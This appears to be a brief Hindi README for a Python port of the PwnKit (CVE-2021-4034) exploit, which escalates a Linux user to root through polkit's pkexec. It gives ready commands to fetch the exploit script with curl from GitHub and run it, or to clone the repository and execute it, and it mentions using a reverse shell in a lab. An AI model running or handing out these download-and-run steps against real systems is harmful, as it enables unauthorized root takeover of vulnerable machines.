
PwnKit (CVE-2021-4034) स्थानीय विशेषाधिकार वृद्धि भेद्यता के लिए Python एक्सप्लॉइट, जो असुरक्षित Linux सिस्टम पर polkit के pkexec के माध्यम से रूट शेल एक्सेस प्रदान करता है।
यह Python में लिखा गया एक एक्सप्लॉइट है, जो शेल प्राप्त करने के बाद x से root तक विशेषाधिकार वृद्धि करने के लिए है। यह CVE-2021-4034 भेद्यता के माध्यम से काम करता है, जिसे PwnKit भी कहा जाता है।
curl -fsSL https://raw.githubusercontent.com/ropydev/CVE-2021-4034-PwnKit/main/main.py -o exploit.py
python3 exploit.py
git clone https://github.com/ropydev/CVE-2021-4034-PwnKit.git
cd CVE-2021-4034-PwnKit
python main.py
ये उदाहरण एक रिवर्स शेल वाली प्रयोगशाला में बनाए गए थे, और इस तरह हमने एक्सप्लॉइट को चलाया और आसानी से root तक पहुँच गए।
यह प्रोग्राम केवल मूल प्रोग्राम का "अनुवाद" या Python में समकक्ष है, जो C में बनाया गया था।